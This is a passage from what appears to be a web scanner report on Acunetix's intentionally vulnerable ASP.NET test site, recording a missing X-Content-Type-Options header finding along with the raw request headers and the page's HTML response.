XC37R1sHPpoA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi/TB7mR4IysbuEg0lOgmHIs" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html
Method	GET
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:24 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" 